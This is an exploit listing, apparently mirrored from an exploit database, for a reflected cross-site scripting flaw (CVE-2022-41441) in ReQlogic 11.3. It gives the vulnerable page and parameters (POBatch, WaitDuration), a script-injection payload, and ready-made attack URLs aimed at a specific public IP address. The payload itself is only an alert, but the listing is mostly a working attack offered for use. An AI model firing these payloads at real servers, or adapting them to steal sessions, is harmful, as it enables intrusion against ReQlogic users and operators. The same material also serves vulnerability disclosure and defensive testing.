Exploit for ReQlogic 11.3 Cross Site Scripting CVE-2022-41441

Name: Exploit for ReQlogic 11.3 Cross Site Scripting CVE-2022-41441
Rating: 5 (108 reviews)

2023-03-28 | CVSS 6.4

## https://sploitus.com/exploit?id=PACKETSTORM:171557
# Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)  
# Date: 9 October 2022  
# Exploit Author: Okan Kurtulus  
# Vendor Homepage: https://reqlogic.com  
# Version: 11.3  
# Tested on: Linux  
# CVE : 2022-41441  
  
# Proof of Concept:  
1- Install ReQlogic v11.3  
2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3  
3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.  
  
#XSS Payload:  
</script><script>alert(1)</script>  
  
#Affected Prameters  
POBatch  
WaitDuration  
  
#Final URLs  
http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3  
http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>